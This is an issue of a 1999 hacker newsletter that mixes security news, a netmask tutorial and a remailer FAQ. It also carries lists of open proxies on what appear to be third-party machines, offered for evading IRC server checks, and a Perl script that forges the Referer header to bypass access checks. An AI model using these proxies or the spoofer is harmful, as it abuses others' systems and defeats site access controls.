hack 14:59 Thursday 21 October 1999 By NATHAN COCHRANE A PRESS release announcement e-mail listserver attached to the Federal Department of Communications, IT and the Arts appears to have been hacked. Several e-mails purporting to be from the department have arrived in reporters' mail boxes this afternoon, almost perfect duplicates of announcements sent earlier in the day about a postal code of practice. However, the sending address was from an anonymous remailer, Replay.com, based in the Netherlands and the e-mails did not contain a subject line. Subtle changes were made to the apparently hacked e-mails, including a pointer to a nonexistent Web page on the DCITA official site and a notice asking those seeking to remove themselves from the mailing list to send a message to a provokative, non-existent address. A spokesman for the Minister, Senator Alston, was unavailable for comment. Roddy Strachan, a Melbourne expert in Linux majordomo list group systems, said it appeared the server had been incorrectly configured, allowing a hacker in through an insecure default setting. "Well, the way I have set up our mailing list program, is that people who aren't subscribed can't post to the list," Strachan said. "And the admin has to approve all posts before it goes out to the receipients. This stops the hassle of bouncing mailers, etc. "Looking at the message it should say majordomo@blah and using Replay.com is very suss. Even the URL, the 'path=1234', just looks like a made-up piece of nonsense." Replay.com specialises in providing anonymous remailing services, cryptographic products including Pretty Good Privacy, books on cracking security systems like DES, and secure Linux distributions. @HWA 50.0 Skewl: "How a Netmask Works" By Steven Lee ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ How a netmask works. _________________________________________________________________ Preface I've been using the internet for several years now. when I set up my first slip connection, I waded through mountains of cryptic information that I barely understood. One of the pieces of information that I really didn't understand at all was how a netmask worked. I just took it on fath that it made sense and used whatever numbers someone gave me. I finally found a reference that (almost) described how a netmask works. Armed with a near description, I sat down with a scientific calculator (I can't convert decimal to binary and back in my head) and figured out what the description meant. Since this has been a hole in my knowlege, and all the references I have seen don't spell it out, I decided to see if I can explain it and add to the pool of knowlege so you won't have to go through my process to discover this. _________________________________________________________________ There are three pieces of information that interact with each other to resolve IP addressing. They are the netmask, the IP address, and the network address. As you may already know, when an IP packet is sent to a foreign address (off of this local network) the network address is all that is used for routing purposes until the packet reaches the target network. At this point the whole IP address is used to determine the specific machine on this network to send the packet to based on local routing tables or dynamic ARP (address resolution protocol, which we will not cover here). In order for a router to know the network address, it uses the IP address and the netmask. Here's the relationship: Your network address is your IP address masked (bitwise AND) with your netmask. This may mean nothing to you without the following clarification. Lets use an example. If your netmask is: 255.255.255.0 and your IP address is: 198.139.158.3 _________________________________________________________________ your Network address is: 198.139.158.0 If you were in a subnetted environment you might have: If your netmask is: 255.255.255.224 and your IP address is: 198.139.158.55 _________________________________________________________________ your Network address is: 198.139.158.32 This still only alludes to the "secret" of the netmask. To shed light on the second example lets take a look at the meaning of the netmask. We are going to convert the decimal notation (4 octets), to binary notation. The 1's in the netmask will imply the value "true", while the 0's will imply the value "false". The true values will be allowed to pass throught the netmask and the false values will not. The netmask acts as a filter. Decimal Binary The IP address: 198.139.158.55 11000110 10001011 10011110 00110111 The netmask: 255.255.255.224 11111111 11111111 11111111 11100000 The Network address would be: 198.139.158.32 11000110 10001011 10011110 00100000 In the above chart, you can see in the binary column that whenever the netmask value is 0, the network address also has a value of 0. Whenever the netmask has a value of 1, the corresponding network address takes its value from the IP address. Try looking down from the IP address, to the netmask, then to the network address, digit by digit. I hope this clarifies it for you. Produced by: Steven Lee, steven@main.nc.us @HWA 51.0 More proxies supplied by IRC 4 ALL ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Sourced by sAs- (sas2@usa.net) A lot of these servers work and are fresh, I've used them successfully on IRC I won't mention which servers you can use that don't require IDENT or check for OPEN PROXIES but they are out there!, suggestion: do a /links and go thru the list until you find a server that will let you on. - Ed http://www.lightspeed.de/irc4all/index.htm Port Wingate service ~~~~ ~~~~~~~~~~~~~~~~~~~~~~ 21 FTP Proxy Server 23 Telnet Proxy Server 53 DNS Proxy Server 80 WWW Proxy Server 110 POP3 Proxy Server 808 Remote Control Service 1080 SOCKS Proxy Server 1090 Real Audio Proxy Server 7000 VDOlive Proxy Server 8000 XDMA Proxy Server 8010 Log Service Telnet/SOCKS (wingate etc) Proxies; ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ LOC URL Port Type Socks 4 / 5 ~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~ ~~~~~~~~ ~~~~~~~~~~~ AR host010226.ciudad.com.ar 1080 SOCKS 4 AU pen22755-1.gw.connect.com.au 1080 WINGATE 5 AU frontier.netline.net.au 1080 SOCKS 4 AU leading.ozemail.com.au 1080 SOCKS 5 AU mail.coolmore.com.au 1080 WINGATE 5 AU ntclib.ntc.qld.edu.au 1080 SOCKS 5 BR ns.uss.br 1080 SOCKS 5 BR eta.riosoft.softex.br 1080 SOCKS 4 CA 165-246.tr.cgocable.ca 1080 WINGATE 5 COM adsl-98.cais.com 1080 RIDEWAY 4 COM server.goway.com 1080 SOCKS 4 COM dciserver.twfrierson.com 1080 SOCKS 4 COM wdpcdc.wdpc.com 1080 WINGATE 4 COM www.hotelescarrousel.com 1080 SOCKS 4 COM tconl9016.tconl.com 1080 WINGATE 5 COM ci30211-b.sptnbrg1.sc.home.com 1080 SOCKS 4 COM MF2-1-036.mgfairfax.rr.com 1080 NETPROXY 4 COM proxy.mppw.com 1080 SOCKS 4 CZ ns.elaso.cz 1080 SOCKS 4 CZ dialog.vol.cz 1080 GATE 5 CZ nb8.czcom.cz 1080 SOCKS 5 IP 194.186.180.100 1080 GATE 5 IP 195.133.120.5 1080 SOCKS 4 IP 200.241.64.130 1080 SOCKS 5 IP 195.14.148.98 1080 SOCKS 4 IP 194.226.165.234 1080 WINGATE 4 JP wingate.shokoren.or.jp 1080 WINGATE 4 JP svr1.macrovision.co.jp 1080 SOCKS 4 JP mail.gincorp.co.jp 1080 WINGATE 4 JP ishibashi.ishibashi.tennouji.osaka.jp 1080 WINGATE 5 JP tateyama.tokyo.main.co.jp 1080 SOCKS 4 JP ns0-gw.nsjnet.co.jp 1080 SOCKS 4 JP dns1.toei-bm.co.jp 1080 SOCKS 5 JP note.ark.ne.jp 1080 SOCKS 4 JP dns.yoshinomasa.co.jp 1080 WINGATE 5 JP www.onlyoneht.co.jp 1080 WINGATE 5 JP ns.holonic.co.jp 1080 SOCKS 4 MX www.columbus.com.mx 1080 SOCKS 4 MX www.internext.com.mx 1080 SOCKS 4 MX www.coroplast.com.mx 1080 SOCKS 4 MX www.baa.com.mx 1080 SOCKS 4 MX www.skydive.com.mx 1080 SOCKS 4 MX www.victor.com.mx 1080 SOCKS 4 MX www.elgigante.com.mx 1080 SOCKS 4 MX skydive.com.mx 1080 SOCKS 4 MX www.centrovirtual.com.mx 1080 SOCKS 4 MX www.swgari.com.mx 1080 SOCKS 4 MX www.parbo.com.mx 1080 SOCKS 4 MX www.simatex.com.mx 1080 SOCKS 4 MX madero2.interxcable.net.mx 1080 SOCKS 4 MX www.interxcable.net.mx 1080 SOCKS 4 MX www.leben.com.mx 1080 SOCKS 4 MX www.mactam.com.mx 1080 SOCKS 4 MX www.magicosur.com.mx 1080 SOCKS 4 MX www.toro.com.mx 1080 SOCKS 4 MX www.vivo.com.mx 1080 SOCKS 4 MX www.somisa.com.mx 1080 SOCKS 4 MX www.directodefabrica.com.mx 1080 SOCKS 4 MX madero1.interxcable.net.mx 1080 SOCKS 4 NET gbell.ne.mediaone.net 1080 SOCKS 4 NET modemcable244.0-200-24.hull.mc.videotron.net 1080 WINGATE 4 NET centervill.ne.mediaone.net 1080 SOCKS 5 NET 216-224-151-137.stk.jps.net 1080 GATE 5 NET 216-224-142-228.stk.jps.net 1080 RIDEWAY 4 NET edtn003189.hs.telusplanet.net 1080 STARTECH 4 NET edtn003331.hs.telusplanet.net 1080 WINGATE 4 NET saward.lnk.telstra.net 1080 WINGATE 5 NET remoha.lnk.telstra.net 1080 WINGATE 5 NZ jonghyun.static.star.net.nz 1080 GATE 5 PE interate.com.pe 1080 SOCKS 4 RU promix.hospital168.nsc.ru 1080 SOCKS 5 RU ns.molot.ru 1080 SOCKS 4 UA stella.interlink.net.ua 1080 SOCKS 4 US carver.ocs.k12.al.us 1080 SOCKS 5 US wforest.ocs.k12.al.us 1080 SOCKS 5 US south.ocs.k12.al.us 1080 SOCKS 5 UY web.urudata.com.uy 1080 SOCKS 4 UY 122-94.w3.com.uy 1080 SOCKS 4 (C) Paradox paradox@cyberjunkie.com Check the pages for more proxies/updates... http://www.lightspeed.de/irc4all/index.htm Other proxies; ~~~~~~~~~~~~~ Sourced by sAs- From http://proxys4all.cgi.net/public.html Magus Net Anonymous Proxy [.com - USA] www.magusnet.com The Magus Net proxy is a great free public proxy server based in Arizona, USA. It can be quiet busy and can be slow or down some times. They provide free HTTP, FTP, WAIS and GOPHER proxy service and also offer a pay service for SSL & SSH. and now have added a demo for SSL. The Magus Net delgate proxy can be used in your browser setting or manually in the url window. It also allows chaining before and after their proxy: Example HTTP: http://magusnet.com:8084/-_-http://www.destination.domain Example FTP: http://magusnet.com:8084/-_-ftp://ftp.destination.domain - Currently active ports: 3128,8081,8082,8083,9000,10080 3128 - Local - Access by Account Holders Only 8081 - Local - Public Access 8082 - Chained thru Ringer DeleGate Proxy in Japan 8083 - Chained thru NRL Onion Router in US - Operated by US.Navy 8084 - WAS chained thru Lucent Personal WWW Assistant in US LPWA has gone pay-only(proxymate.com). Port closed July 14, 1999 See http://www.lpwa.com for details. 9000 - Local - Encrypts with SSL between your browser and this Proxy 10080 - Local - Public Access Magus Net proxy hosts can also be reached as: magusnet.gilbert.az.us Junkbuster Proxy Services [.com -USA] www.junkbuster.com The Internet Junkbuster Proxy blocks unwanted banner ads and protects your privacy from cookies and other threats. It's free and runs under Windows 95/98/NT and a variety of UNIX-like systems. It works with almost any browser. Installation typically takes minutes. JunkBuster Proxys: ~~~~~~~~~~~~~~~~~~ yoho.uwaterloo.ca:8000 kleinbonum.ethz.ch:8000 xar.ethz.ch:8000 alpha.fact.rhein-ruhr.de:8000 fax-bior.sozwi.uni-kl.de:8000 junkbuster.rz.uni-karlsruhe.de:8000 maccaroni.unix-ag.uni-kl.de:8000 maccaroni.unix-ag.uni-kl.de:8001 maccaroni.unix-ag.uni-kl.de:8002 maccaroni.unix-ag.uni-kl.de:8003 mail.sozwi.uni-kl.de:8000 proxy.rhein-ruhr.de:8000 rena.zfn.uni-bremen.de:3128 www-cache.unix-ag.uni-kl.de:8000 www-cache.unix-ag.uni-kl.de:8001 www-cache.unix-ag.uni-kl.de:8002 www-cache.unix-ag.uni-kl.de:8003 ad-proxy.eclipse.net:8000 olympus.eclipse.net:8000 very.elastic.org:8000 Web-based CGI proxies; ~~~~~~~~~~~~~~~~~~~~~~ http://proxys4all.cgi.net/web-based.html Telnet/SOCKS proxies; ~~~~~~~~~~~~~~~~~~~~~ 193.13.151.71 wingates all port 23 195.226.224.136 195.226.228.53 I keep hoping to have more for you all 195.226.228.80 but as fast as I can get them they tend to die. 195.226.241.194 195.246.23.33 Best bet is always to scan your own. 200.231.130.210 202.208.218.5 These have not all been tested yet. 203.116.31.153 206.58.25.46 206.74.68.76 207.15.167.177 207.216.188.21 207.44.26.82 208.222.9.10 209.160.126.201 209.20.27.130 210.161.237.19 210.162.200.83 210.163.83.178 212.30.75.8 216.77.244.92 24.3.105.29 24.3.11.131 24.3.131.46 24.3.82.41 24.48.44.57 24.64.132.67.on.wave.home.com 24.93.112.238 24.93.158.201 24.93.158.57 55-050.hy.cgocable.ca adsl-151-198-16-75.bellatlantic.net adsl-206-170-148-119.dsl.pacbell.net adsl-216-100-248-127.dsl.pacbell.net adsl-216-100-248-86.dsl.pacbell.net adsl-77-244-92.mia.bellsouth.net adsl1-110.mts.net adsl1-186.mts.net as1-8.qualitynet.net as1-8.qualitynet.net as3-53.qualitynet.net as4-78.qualitynet.net as5-19.qualitynet.net as8-157.qualitynet.net as8-194.qualitynet.net cc42238-a.avnl1.nj.home.com cc495632-a.srst1.fl.home.com cc762726-a.wlgrv1.pa.home.com cdr8-53.accesscable.net cowsys03.cowansystems.com cs9360-254.austin.rr.com cue.dk d185d183a.rochester.rr.com d185d1ef9.rochester.rr.com dns.fatwa.gov.kw dns.meridien.com.kw dt095n09.maine.rr.com dt095nc9.maine.rr.com dxt.ozemail.com.au dynamic57.pit.adelphia.net ewwmail.ozemail.com.au gdsl173.sttl.uswest.net gen2-114ip6.cadvision.com gen2-87ip27.cadvision.com host-209-214-34-114.mco.bellsouth.net hse-tor-ppp21220.sympatico.ca hssktn1-82.sk.sympatico.ca i-tec.co.jp interlog.interlog.fr ip2-196.highend.com ishibashi.ishibashi.tennouji.osaka.jp lan-duclos4-15.cancom.net m44155.direcpc.net mail.sjn.nl mdrass.moc.kw mp-217-242-207.daxnet.no nat198.85.mpoweredpc.net nbtel3-78.nbtel.net nbtel6-93.nbtel.net ppdual.augen.med.uni-giessen.de ppp-16-41.cyberia.net.lb ppp-16-80.cyberia.net.lb pppa4-resalegreenbay1-5r1066.saturn.bbn.com pppa40-resalegreenbay1-5r1066.saturn.bbn.com pppa5-resalelansing1-4r1106.saturn.bbn.com ppplink-dial55.idepot.net proxy-laregione.ibbs.net sacnl.globalpc.net siia.uan.mx sim-home-5-14.urbanet.ch stn194.hiq-ca.com studios.alger.it studios.alger.it we-24-130-42-117.we.mediaone.net wingate.rosdev.ca wlc35.cablelan.net AU - AUSTRALIA URL / IP PORT CONNECTION COMMENTS leading1.ozemail.com.au 1080 WINGATE COM - COMMERCIAL URL / IP PORT CONNECTION COMMENTS www.exponential.com 1080 SOCKS www.aquatechpools.com 1080 SOCKS cx107569-b.fed1.sdca.home.com 1080 WINGATE revere-nt.reverecontrol.com 1080 SOCKS cramer.qni.com 1080 WINGATE mail.arielmutualfund.com 1080 WINGATE No Socks EE - ESTONIA / IP PORT CONNECTION COMMENTS ttp.park.tartu.ee 1080 WINGATE GR- GREECE URL / IP PORT CONNECTION COMMENTS pacman-cafe0.tri.forthnet.gr 1080 WINGATE IP URL / IP PORT CONNECTION COMMENTS 194.186.208.54 1080 SOCKS 194.149.136.55 1080 SOCKS 194.149.136.3 1080 SOCKS 194.149.136.42 1080 SOCKS 24.230.31.236 1080 WINGATE 195.61.198.1 1080 WINGATE 209.178.61.117 1080 WINGATE IT - ITALY URL / IP PORT CONNECTION COMMENTS 194.185.198.28 1080 SOCKS www.aere.it 1080 SOCKS JP - JAPAN URL / IP PORT CONNECTION COMMENTS ark.ark.ne.jp 1080 SOCKS ns.tsuruga.or.jp 1080 SOCKS MK - MACEDONIA URL / IP PORT CONNECTION COMMENTS www.zic.gov.mk 1080 SOCKS MX - MEXICO URL / IP PORT CONNECTION COMMENTS t2s20.data.net.mx 1080 WINGATE No Socks NET - NETWORK URL / IP PORT CONNECTION COMMENTS modemcable227.152.mtimi.videotron.net 23 STARGATE col-000-6.iquest.net 1080 SOCKS softengtech-i.iquest.net 1080 SOCKS holmes.intellex.net 1080 SOCKS CBL-pssandhu1.hs.earthlink.net 1080 WINGATE poste253.autray.net 1080 WINGATE monelco.wincom.net 1080 WINGATE Only Telnet SK - SLOVAK REPUBLIC URL / IP PORT CONNECTION COMMENTS gw-2.tatrahome.sk 1080 SOCKS Copyright ©1998-99 Proxys 4 All @HWA 52.0 Perl source for a webspoofing HTTP grabber ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Sourced by sAs- From http://proxys4all.cgi.net/files/webspf.pl #!/usr/bin/perl # # Web Spoof # Pavel Aubuchon-Mendoza [admin@deviance.org][http://www.deviance.org] # # Summary: # Works as a normal command line web retrieval script, # except will spoof the referer. This can be left to the script to do, # or specified in the command line. This will bypass any kind of reference # checking, in most cases. Will also screw up the REMOTE_HOST variable which # some cgi scripts use, but the correct IP will of course be sent. Default # broswer is Netscape 4.5 under Win95. This can be changed in the script. # # Usage: - default output is standard out, to save to a file # you will need to redirect it, especially for # binary/image files - # # ./webspf.pl [file] # # Examples: # # ./webspf.pl language.perl.com/info/software.html > software.html # - referer would be language.perl.com/info/index.html - # # ./webspf.pl www.linux.org/images/logo/linuxorg.gif > penguin.gif # - referer would be www.linux.org/images/logo/index.html - # # ./webspf.pl www.linux.org/ www.freebsd.org/whatever.html > index.html # - referer would be www.freebsd.org/whatever.html - # # # use IO::Socket; $loc = $ARGV[0]; # www.a.com/test.html $temp = reverse($loc); # lmth.tset/moc.a.www $host = substr($temp,rindex($temp,"\/")+1); # moc.a.www $host = reverse($host); # www.a.com $dir = substr($loc,index($loc,"\/")); # /test.html $referer = $ARGV[1]; # if($referer eq "") { # true $temp = substr($temp,index($temp,"\/")+1); # /moc.a.www $temp = reverse($temp); # www.a.com/ $referer = $temp . "index\.html"; # www.a.com/index.html } # spoofed referer! print STDERR "\nWebSpoof v1.0 : 12/18/1998\n"; print STDERR "Pavel Aubuchon-Mendoza + http://www.deviance.org\n\n" $res = 0; $handle = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => 80) or $res = 1; if($res eq 0) { $handle->autoflush(1); print STDERR "\[Connected to $host\]\n"; print $handle "GET $dir HTTP/1.0\n"; print $handle "Referer: $referer\n"; print $handle "Connection: Close\n"; print $handle "User-Agent: Mozilla\/4.5 [en] \(Win95\; I\)\n"; print $handle "Host: $host\n"; print $handle "Accept: image\/gif\, image\/x-xbitmap\, image\/jpeg\, image\/pjpeg\, image\/png\, *\/*\n"; print $handle "Accept-Encoding: gzip\n"; print $handle "Accept-Language: en\n"; print $handle "Accept-Charset: iso-8859-1\,\*\,utf-8\n\n"; while($temp ne "") { # read some headers $temp = <$handle>; chop($temp);chop($temp); @sort = split(/:/,$temp); if(@sort[0] =~ /server/i) { print STDERR " \[$temp\]\n"; } if(@sort[0] =~ /date/i) { print STDERR " \[$temp\]\n"; } if(@sort[0] =~ /content/i) { print STDERR " \[$temp\]\n"; } } print STDERR "\[Recieving data\]\n"; binmode(STDOUT); while(<$handle>) { print "$_"; } close($handle); print STDERR "\[Connection Closed\]\n"; } else { print STDERR "\[Could not connect to $host\]\n"; } @HWA 53.0 MACMILLAN USA MOVES TO SECURE LINUX ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by Thejian, Saturday 23rd October 1999 on 1:25 pm CET MacMillan Publishing USA has entered into a strategic alliance with SecurityPortal.com to bring online security technologies to users of the Linux operating system (OS). The new product, Maximum Security Linux, will be jointly-released to provide administrators who run Linux with security-related capabilities such as intrusion detection, system auditing and monitoring along with virus protection. The package suite will bundle a wide range of security software made available through the GNU General Public License (GPL), and will provide access to "best practices" FAQs, policy guides and various security tips. http://www.ecommercetimes.com/news/articles/991022-7.shtml MacMillan USA Moves To Secure Linux By Matthew W. Beale E-Commerce Times October 22, 1999 MacMillan Publishing USA has entered into a strategic alliance with SecurityPortal.com to bring online security technologies to users of the Linux operating system (OS). The new product, Maximum Security Linux, will be jointly-released to provide administrators who run Linux with security-related capabilities such as intrusion detection, system auditing and monitoring along with virus protection. The package suite will bundle a wide range of security software made available through the GNU General Public License (GPL), and will provide access to "best practices" FAQs, policy guides and various security tips. "MacMillan's retail distribution and SecurityPortal's security knowledge makes for a great partnership," commented Steve Schafer, Sr., title manager for Macmillan's Linux software. "Getting this knowledge and these tools into the hands of the Linux user is essential to help ensure the security of the many personal and corporate Linux systems being installed every day." Rising Security Threats Jim Reavis, SecurityPortal.com Webmaster, designed the product in response to "the ever increasing size and complexity of networked software, combined with the sophistication of today's hackers." He added that Internet professionals need to more seriously consider securing their operations, pointing out that "we are more exposed to security threats than at any other time." There are some 12 million Linux users worldwide, according to International Data Corp. (IDC). Those numbers alone, say industry analysts, should serve as incentive for companies to move into the relatively quiet Linux security solutions market. Maximum Secure Linux works with systems running the Linux kernel version 2.2.5 or higher. Internet security information provider SecurityPortal.com also offers "technotes" and opinion pieces from IT security experts, security-related news and links to security alerts, tools and other resources. The third largest operating system provider after Microsoft and Apple, MacMillan offers The Complete Linux OS, a Linux distribution by MandrakeSoft that is based on Red Hat. Establishing an early strategic relationship with Red Hat, Inc., MacMillan has been involved with the Linux community for almost four years. E-Commerce Security Linux is increasingly being deployed by e-commerce operations, and IDC numbers show that the open-source environment captured more than 17 percent of all server shipments last year. Security concerns among e-commerce professionals, including those working with Linux-based systems, are sometimes justified. A study conducted by Information Security Magazine earlier this year indicated that e-commerce operations are 57 percent more likely to experience a security breach than other online sites. Additionally, e-commerce sites are 24 percent more likely to be the target of a hacker/cracker attack. @HWA 54.0 ANONYMOUS REMAILERS ~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ, Saturday 23rd October 1999 on 2:56 am CET "A remailer is computer service that privatizes your e-mail. This is in sharp contrast to most Internet Service Providers and corporate e-mail providers, which are terribly non private." Interested in them? Read Remailer FAQ. http://www.andrebacard.com/remail.html Anonymous Remailer FAQ by André Bacard, Author of Computer Privacy Handbook ("The Scariest Computer Book of the Year") [Updated 1 September 1999] [This article offers a nontechnical overview of "remailers" to help you decide whether to use these computer services. Links at will connect you with specific remailers. I have written this especially for persons with a sense of humor. You may distribute this (unaltered) FAQ for non-commercial purposes. Copyright 1999 by André Bacard]. What is a remailer? A remailer is computer service that privatizes your e-mail. This is in sharp contrast to most Internet Service Providers and corporate e-mail providers, which are terribly unprivate. Traditionally, a remailer allowed you to send electronic mail to a Usenet news group or to a person without the recipient knowing your true name or your e-mail address. Today, a new variety of web-based remailers permits you to send mail using your real name (if you wish), while protecting your email records from the snooping eyes of your Internet Service Provider. In the first version of this FAQ (published in 1995), all popular remailers were free-of-charge. Today, a number of services either charge user fees, or support themselves via advertisers. Why would YOU use remailers? Maybe you're a computer engineer who wants to express opinions about computer products, opinions that your employer might hold against you. Possibly you live in a community that is violently intolerant of your social, political, or religious views. Perhaps you're seeking employment via the Internet and you don't want to jeopardize your present job. Possibly you want to place personal ads. Perchance you're a whistle-blower afraid of retaliation. Conceivably you feel that, if you criticize your government, Big Brother will monitor you. Maybe you don't want people "spamming" or "flaming" your corporate e-mail address. In short, there are many legitimate reasons why you, a law abiding person, might use remailers. How does a remailer work? Let's take an imaginary example. Suppose that a battered woman, Susan, wants to post a message crying out for help. How can Susan post her message and receive responses confidentially? She might use a "pseudo-anonymous" remailer run by Andre Bacard called the "Bacard.com" remailer. (This remailer is fictitious!) If she wrote to me, my "bacard.com" computer would STRIP AWAY Susan's real name and address (the header at the top of Susan's e-mail), replace this data with a dummy address (for example, and forward Susan's message to the newsgroup or person of Susan's choice. Also, my computer would automatically notify Susan that her message had been forwarded under her new identity . Suppose that Debbie responds to Susan. My computer will STRIP AWAY Debbie's real name and address, give Debbie a new identity, and forward the message to Susan. This process protects everyone's privacy. This process is tedious for a person but easy for a computer. Are there many remailers? The good news... Yes, there are dozens of popular remailers. The bad news... Remailers tend to come and go. First, they require equipment and labor to set up and maintain. Second, a minority of individuals who use remailers are a pain in the neck. These selfish persons drive remailer operators into early retirement. Third, many remailers owners tire of losing money. I hope that we are entering an era of financially profitable remailers. This profitability will permit better reliability and stability. If you live and breathe computers, the best place to keep in touch with the Art & Science of remailers is at the Usenet newsgroup . If you don't know the difference between a bite and a bit, I recommend you simply study the remailers found at my web site.. Why are some remailers free, while others charge fees? In the beginning, all remailers were free to users (but not to the people who ran them!). How could a remailer administrator charge people who wanted maximum privacy? How could administrators ask for a credit card number or take checks? Several years ago, there was no technical solution to these problems. In 1995, I wrote: "In the future, remailer operators might charge for their services. Privacy is valuable. For example, offshore banking is one of the world's biggest businesses. It is easy to imagine Remailer, ETC., a cyberspace company that goes beyond Mailbox, ETC. (the existing company which rents rents snail mail boxes). In order for remailers to become commercial on a big scale, anonymous payment systems such as DigiCash must become popular." My predictions came true. Today, many remailer operators charge fees for the same reason that you go to work in order to pay for food, housing, etc. Why do people operate remailers, if not for money? Why does André Bacard spend hours writing FAQs? Why do some people volunteer to help others? Some people set up remailers for their own personal usage, which they may or may not care to share with the rest of us. Some persons are educators or activists. Joshua Quittner, co-author of the high-tech thriller Mother's Day, interviewed Mr. Julf Helsingius for Wired magazine. Helsingius, who ran the world's most popular remailer for three years until he retired in August 30, 1996, said: "It's important to be able to express certain views without everyone knowing who you are. One of the best examples was the great debate about Caller ID on phones. People were really upset that the person at the receiving end would know who was calling. On things like telephones, people take for granted the fact that they can be anonymous if they want to and they get really upset if people take that away. I think the same thing applies for e-mail. Living in Finland, I got a pretty close view of how things were in the former Soviet Union. If you actually owned a photocopier or even a typewriter there you would have to register it and they would take samples of what your typewriter would put out so they could identify it later. That's something I find so appalling. The fact that you have to register every means of providing information to the public sort of parallels it, like saying you have to sign everything on the Net. We always have to be able to track you down". What is the difference between a "pseudo-anonymous" and an "anonymous" remailer? Most people use the expression "anonymous remailer" as short hand for both types of remailers. This causes confusion! A "PSEUDO anonymous" remailer is basically an account that you open with a remailer operator. The fictitious Bacard.com (described above) is a PSEUDO-anonymous remailer. This means that I, the operator, and my assistants KNOW your real e-mail address. Your privacy is as good as the remailer operator's power and integrity to protect your records. In practice, what does this mean? Someone might get a court order to force a PSEUDO anonymous remailer operator to reveal your true identity. The Finnish police forced Julf Helsingius to reveal at least one person's true identity. The advantage of most PSEUDO-anonymous remailers is that they are user-friendly. If you can send e-mail, you can probably understand PSEUDO anonymous remailers. The price you pay for ease of use is less security. Truly ANONYMOUS remailers are a different animal. The good news... They provide much more privacy than PSEUDO anonymous remailers. The bad news... They are much harder to use than their PSEUDO anonymous cousins. There are basically two types of ANONYMOUS remailers. They are called "Cypherpunk remailers" and Lance Cottrell's "Mixmaster remailers". Note that I refer to remailers in the plural. If you want maximum privacy, you should send your message through two or more remailers. If done properly, you can insure that NOBODY (no remailer operator or any snoop) can read both your real name and your message. This is the real meaning of ANONYMOUS. In practice, nobody can force an ANONYMOUS remailer operator to reveal your identity, because the operator has NO CLUE who you are! For 99% of the Internet public, the PSEUDO anonymous remailers at my web site are more than adequate. What are the newest trends in remailers? Web-based remailers are very popular. This trend was fueled, in part, by Microsoft's and Yahoo!'s services. Web-based services enable you to check your email via the Internet wherever you might be, for example at a public library. For security purposes, a movement is catching on to move remailers "offshore", in particular to the Caribbean. The United States Congress (and its enforcers -- the NSA, CIA, FBI, IRS, etc) is , by far, the world's most aggressive opponent of privacy. For many reasons, privacy can be increased by operating outside the United States. What makes an "ideal" remailer? An "ideal" remailer: (a) Is easy to use. (b) Is operated by reliable persons. (c) Uses PGP or other high-level encryption, d) Allows you to read your email without forwarding it to your Internet Service Provider, e) Is owned and operated outside the United States, and f) Allows security experts and computer enthusiasts to examine its computer source code. Many top-rate remailers do NOT satisfy all these requirements. However, these remailers are far superior to your ordinary Internet Service Provider. So please don't make yourself crazy looking for the "perfect" solution. Life is not perfect. If a remailer does NOT permit PGP (Pretty Good Privacy) or other strong encryption, reasonable people might assume that the remailer administrator enjoys reading forwarded mail. What makes a responsible remailer user? A responsible user: (a) Sends text files of a reasonable length. Binary photo files of Pam Anderson, or the Babe-of-the-Month, can take too much transmission time. (b) Transmits files selectively. Remailers are NOT designed to send "You Can Get Rich" chain letters or other junk mail. Who are irresponsible remailer users? Here is a quote from one remailer administrator: "This remailer has been abused in the past, mostly by users hiding behind anonymity to harass other users. I will take steps to squish users who do this. Lets keep the net a friendly and productive place.... Using this remailer to send death threats is highly obnoxious. I will reveal your return address to the police if you do this." Legitimate remailer administrators will NOT TOLERATE serious harassment or criminal activity. Report any such incidents to the remailer administrator. Having said that, I must report that I receive e-mail such as this: "Someone is using a FU..ING remailer to call me a hateful person. I want to get my FU..ING hands on that FU..ING (obscenities deleted) person and kill him for spreading the vicious lie that I have a bad temper. Why won't the FU..ING jerk who runs the remailer help innocent victims like me?" As I implied earlier, it is not easy to run a remailer! How safe are remailers? [for paranoids only :-)] For most low-security tasks, such as responding to personal ads, PSEUDO anonymous remailers with passcode protection are undoubtedly safer than using real e-mail addresses. However, all the best made plans of mice and men have weaknesses. Suppose, for example, that you are a government employee, who just discovered that your boss is taking bribes. Is it safe to use a PSEUDO anonymous remailer to send evidence to a government whistleblower's e-mail hot line? Here are a few points to ponder: (a) The person who runs your e-mail system might intercept your secret messages to and from the remailer. This gives him proof that YOU are reporting your corrupt boss. This evidence could put you in danger. (b) Maybe the remailer is a government sting operation or a criminal enterprise designed to entrap people. The person who runs this service might be your corrupt boss' partner. Warning: I have seen a few remailers that strike me as suspicious. For legal reasons, I cannot name these services. You must decide for yourself who to trust. (c) Hackers can do magic with computers. It's possible that civilian or Big Brother hackers have broken into the remailer (unbeknownst to the remailer's administrator), and that they can read your messages at will. (d) It is possible that Big Brother collects, scans, and stores all messages, including passcodes, into and out of the remailer. (e) If you use a United States based remailer, a U.S. judge could subpoena the remailer's records. For these reasons, hard-core privacy people are leery of PSEUDO anonymous remailers. These people use Cypherpunk or Mixmaster programs that route their messages through several ANONYMOUS remailers. In addition, they use PGP encryption software for all messages. (For a good anonymous remailer try out www.replay.com ... - Ed) @HWA 55.0 PROJECT GAMMA STILL DOWN ~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ, Saturday 23rd October 1999 on 2:12 am CET Project Gamma is still down, but WHiTe VaMPiRe tells all of its visitors: "The DNS will be down for another week. Probably the soonest pG will be back up now is on the 25th. ;\ We are doing everything that is humanly possible to bring it back, as quickly as possible" @HWA 56.0 PRIVATE DESKTOP ~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ, Saturday 23rd October 1999 on 2:24 am CET ConSeal ®Private Desktop is a personal firewall that puts you in full control of your PC's connection to the Internet! Designed for the non-technical user, this privacy management tool stops all known attacks including Back Orifice, denial of service and cyber stalkers http://www.signal9.com/products/desktop/index.html @HWA 57.0 Y2K RELATED DISASTER ~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ, Saturday 23rd October 1999 on 1:04 am CET Chicago Tribune 